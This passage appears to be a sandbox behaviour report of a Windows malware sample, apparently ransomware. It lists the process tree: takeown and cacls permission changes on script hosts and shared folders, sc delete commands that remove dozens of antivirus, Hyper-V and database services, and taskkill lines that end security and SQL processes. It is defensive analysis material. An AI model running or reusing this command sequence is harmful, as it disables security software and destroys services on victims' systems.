    3⤵
    PID:4460
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress
    3⤵
    PID:4976
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\cscript.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1416
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /g Administrators:f
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:772
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /g Users:r
    3⤵
    PID:2176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4084
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /g Administrators:r
    3⤵
    PID:5092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:272
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d SERVICE
    3⤵
    PID:280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:304
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d mssqlserver
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4556
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d "network service"
    3⤵
    PID:2480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4312
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d system
    3⤵
    PID:3868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress
    3⤵
    PID:4820
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\cscript.exe /a
    3⤵
    - Modifies file permissions
    PID:3772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f
    3⤵
    PID:4360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4716
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r
    3⤵
    PID:3308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2884
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r
    3⤵
    PID:2496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5040
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE
    3⤵
    PID:3088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1124
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver
    3⤵
    PID:4128
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeHMRecovery
      4⤵
      PID:1960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2304
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"
    3⤵
    PID:4340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4220
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d system
    3⤵
    PID:2488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1704
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress
    3⤵
    PID:2056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1192
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
    3⤵
    PID:1768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2972
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
    3⤵
    PID:1172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4720
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
    3⤵
    PID:1432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2432
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
    3⤵
    PID:4028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4964
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
    3⤵
    PID:4712
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
    3⤵
    PID:2108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3140
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system
    3⤵
    PID:2124
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
    3⤵
    PID:540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
    3⤵
    - Modifies file permissions
    PID:4488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3684
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
    3⤵
    PID:488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2860
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3820
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
    3⤵
    PID:4952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:484
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
    3⤵
    PID:4260
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
    3⤵
    PID:3364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2428
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
    3⤵
    PID:864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4912
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
    3⤵
    PID:2296
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3580
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
    3⤵
    PID:4336
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\ProgramData /a
    3⤵
    - Modifies file permissions
    PID:908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /g Administrators:f
    3⤵
    PID:4600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /e /g Users:r
    3⤵
    PID:4804
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /e /g Administrators:r
    3⤵
    PID:3984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2316
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /e /d SERVICE
    3⤵
    PID:3508
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /e /d mssqlserver
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3260
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /e /d "network service"
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4628
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /e /d system
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4456
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /e /d mssql$sqlexpress
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Users\Public /a
    3⤵
    - Modifies file permissions
    PID:4460
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /g Administrators:f
    3⤵
    PID:3740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3380
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /e /g Users:r
    3⤵
    PID:2856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /e /g Administrators:r
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:772
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /e /d SERVICE
    3⤵
    PID:2116
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /e /d mssqlserver
    3⤵
    PID:284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4752
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /e /d "network service"
    3⤵
    PID:4972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:304
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /e /d system
    3⤵
    PID:300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4556
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /e /d mssql$sqlexpress
    3⤵
    PID:840
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmickvpexchange"
    3⤵
    PID:4312
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicguestinterface"
    3⤵
    PID:3868
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicshutdown"
    3⤵
    PID:3236
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicheartbeat"
    3⤵
    PID:4960
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicrdv"
    3⤵
    PID:3544
- - C:\Windows\SysWOW64\sc.exe
    sc delete "storflt"
    3⤵
    PID:3772
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmictimesync"
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicvss"
    3⤵
    PID:3852
- - C:\Windows\SysWOW64\sc.exe
    sc delete "hvdsvc"
    3⤵
    PID:1420
- - C:\Windows\SysWOW64\sc.exe
    sc delete "nvspwmi"
    3⤵
    - Launches sc.exe
    PID:2180
- - C:\Windows\SysWOW64\sc.exe
    sc delete "wmms"
    3⤵
    - Launches sc.exe
    PID:3308
- - C:\Windows\SysWOW64\sc.exe
    sc delete "AvgAdminServer"
    3⤵
    PID:3536
- - C:\Windows\SysWOW64\sc.exe
    sc delete "AVG Antivirus"
    3⤵
    - Launches sc.exe
    PID:3284
- - C:\Windows\SysWOW64\sc.exe
    sc delete "avgAdminClient"
    3⤵
    - Launches sc.exe
    PID:2508
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SAVService"
    3⤵
    - Launches sc.exe
    PID:2776
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SAVAdminService"
    3⤵
    PID:4868
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos AutoUpdate Service"
    3⤵
    PID:1124
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Clean Service"
    3⤵
    PID:1116
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Device Control Service"
    3⤵
    PID:3964
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Endpoint Defense Service"
    3⤵
    PID:2184
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos File Scanner Service"
    3⤵
    PID:2132
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Health Service"
    3⤵
    PID:1260
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos MCS Agent"
    3⤵
    - Launches sc.exe
    PID:2052
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos MCS Client"
    3⤵
    PID:1704
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SntpService"
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swc_service"
    3⤵
    PID:2320
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swi_service"
    3⤵
    PID:4492
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos UI"
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swi_update"
    3⤵
    - Launches sc.exe
    PID:3356
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Web Control Service"
    3⤵
    PID:2972
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos System Protection Service"
    3⤵
    PID:1172
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Safestore Service"
    3⤵
    PID:3112
- - C:\Windows\SysWOW64\sc.exe
    sc delete "hmpalertsvc"
    3⤵
    - Launches sc.exe
    PID:1432
- - C:\Windows\SysWOW64\sc.exe
    sc delete "RpcEptMapper"
    3⤵
    PID:2616
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Endpoint Defense Service"
    3⤵
    PID:2432
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SophosFIM"
    3⤵
    PID:4560
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swi_filter"
    3⤵
    PID:4276
- - C:\Windows\SysWOW64\sc.exe
    sc delete "FirebirdGuardianDefaultInstance"
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\sc.exe
    sc delete "FirebirdServerDefaultInstance"
    3⤵
    PID:2252
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLFDLauncher"
    3⤵
    - Launches sc.exe
    PID:2100
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLSERVER"
    3⤵
    PID:4608
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLSERVERAGENT"
    3⤵
    - Launches sc.exe
    PID:4788
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLBrowser"
    3⤵
    PID:2124
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLTELEMETRY"
    3⤵
    PID:4896
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MsDtsServer130"
    3⤵
    PID:540
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SSISTELEMETRY130"
    3⤵
    PID:4488
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLWriter"
    3⤵
    PID:3340
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$VEEAMSQL2012"
    3⤵
    PID:2928
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$VEEAMSQL2012"
    3⤵
    - Launches sc.exe
    PID:2288
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL"
    3⤵
    PID:2120
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent"
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLServerADHelper100"
    3⤵
    PID:3820
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLServerOLAPService"
    3⤵
    PID:4920
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MsDtsServer100"
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ReportServer"
    3⤵
    PID:3120
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLTELEMETRY$HL"
    3⤵
    PID:5056
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMBMServer"
    3⤵
    PID:5076
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$PROGID"
    3⤵
    PID:3364
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$WOLTERSKLUWER"
    3⤵
    PID:4816
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$PROGID"
    3⤵
    - Launches sc.exe
    PID:1048
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$WOLTERSKLUWER"
    3⤵
    PID:4444
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLFDLauncher$OPTIMA"
    3⤵
    PID:2548
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$OPTIMA"
    3⤵
    PID:368
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$OPTIMA"
    3⤵
    PID:3580
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ReportServer$OPTIMA"
    3⤵
    PID:3548
- - C:\Windows\SysWOW64\sc.exe
    sc delete "msftesql$SQLEXPRESS"
    3⤵
    PID:4824
- - C:\Windows\SysWOW64\sc.exe
    sc delete "postgresql-x64-9.4"
    3⤵
    - Launches sc.exe
    PID:3460
- - C:\Windows\SysWOW64\sc.exe
    sc delete "WRSVC"
    3⤵
    PID:3216
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ekrn"
    3⤵
    PID:3044
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ekrnEpsw"
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klim6"
    3⤵
    PID:4804
- - C:\Windows\SysWOW64\sc.exe
    sc delete "AVP18.0.0"
    3⤵
    PID:3320
- - C:\Windows\SysWOW64\sc.exe
    sc delete "KLIF"
    3⤵
    PID:4496
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klpd"
    3⤵
    PID:2448
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klflt"
    3⤵
    PID:1328
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klbackupdisk"
    3⤵
    PID:3508
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klbackupflt"
    3⤵
    - Launches sc.exe
    PID:2384
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klkbdflt"
    3⤵
    PID:4784
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klmouflt"
    3⤵
    PID:816
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klhk"
    3⤵
    - Launches sc.exe
    PID:1496
- - C:\Windows\SysWOW64\sc.exe
    sc delete "KSDE1.0.0"
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\sc.exe
    sc delete "kltap"
    3⤵
    PID:4628
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ScSecSvc"
    3⤵
    PID:4956
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Mail Protection"
    3⤵
    - Launches sc.exe
    PID:4144
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Scanning Server"
    3⤵
    PID:3300
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Scanning ServerEx"
    3⤵
    PID:4188
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Online Protection System"
    3⤵
    - Launches sc.exe
    PID:4008
- - C:\Windows\SysWOW64\sc.exe
    sc delete "RepairService"
    3⤵
    PID:716
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Browsing Protection"
    3⤵
    PID:3344
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Quick Update Service"
    3⤵
    - Launches sc.exe
    PID:3108
- - C:\Windows\SysWOW64\sc.exe
    sc delete "McAfeeFramework"
    3⤵
    PID:2856
- - C:\Windows\SysWOW64\sc.exe
    sc delete "macmnsvc"
    3⤵
    - Launches sc.exe
    PID:1948
- - C:\Windows\SysWOW64\sc.exe
    sc delete "masvc"
    3⤵
    - Launches sc.exe
    PID:3248
- - C:\Windows\SysWOW64\sc.exe
    sc delete "mfemms"
    3⤵
    PID:2176
- - C:\Windows\SysWOW64\sc.exe
    sc delete "mfevtp"
    3⤵
    PID:3232
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmFilter"
    3⤵
    PID:5048
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMLWCSService"
    3⤵
    - Launches sc.exe
    PID:4752
- - C:\Windows\SysWOW64\sc.exe
    sc delete "tmusa"
    3⤵
    PID:288
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmPreFilter"
    3⤵
    PID:4940
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMSmartRelayService"
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMiCRCScanService"
    3⤵
    PID:4972
- - C:\Windows\SysWOW64\sc.exe
    sc delete "VSApiNt"
    3⤵
    - Launches sc.exe
    PID:1748
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmCCSF"
    3⤵
    PID:4072
- - C:\Windows\SysWOW64\sc.exe
    sc delete "tmlisten"
    3⤵
    PID:3860
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmProxy"
    3⤵
    PID:4556
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ntrtscan"
    3⤵
    PID:3948
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ofcservice"
    3⤵
    - Launches sc.exe
    PID:2544
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmPfw"
    3⤵
    PID:3876
- - C:\Windows\SysWOW64\sc.exe
    sc delete "PccNTUpd"
    3⤵
    PID:3236
- - C:\Windows\SysWOW64\sc.exe
    sc delete "PandaAetherAgent"
    3⤵
    PID:4960
- - C:\Windows\SysWOW64\sc.exe
    sc delete "PSUAService"
    3⤵
    PID:4304
- - C:\Windows\SysWOW64\sc.exe
    sc delete "NanoServiceMain"
    3⤵
    PID:4196
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPIntegrationService"
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPProtectedService"
    3⤵
    PID:4716
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPRedline"
    3⤵
    - Launches sc.exe
    PID:2172
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPSecurityService"
    3⤵
    PID:3308
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPUpdateService"
    3⤵
    - Launches sc.exe
    PID:4544
- - C:\Windows\SysWOW64\sc.exe
    sc delete "UniFi"
    3⤵
    PID:5040
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im PccNTMon.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2508
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im NTRtScan.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4240
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmListen.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:744
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmCCSF.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1648
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmProxy.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4020
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TMBMSRV.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2320
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TMBMSRV.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1808
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmPfw.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4060
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im CNTAoSMgr.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3880
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlbrowser.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2932
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlwriter.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5052
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlservr.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4276
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im msmdsrv.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1960
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im MsDtsSrvr.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4792
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlceip.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1880
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im fdlauncher.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3940
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im Ssms.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:488
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im SQLAGENT.EXE
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4916
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im fdhost.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3820
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im fdlauncher.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4260
- - C:\Windows\SysWOW64\taskkill.exe
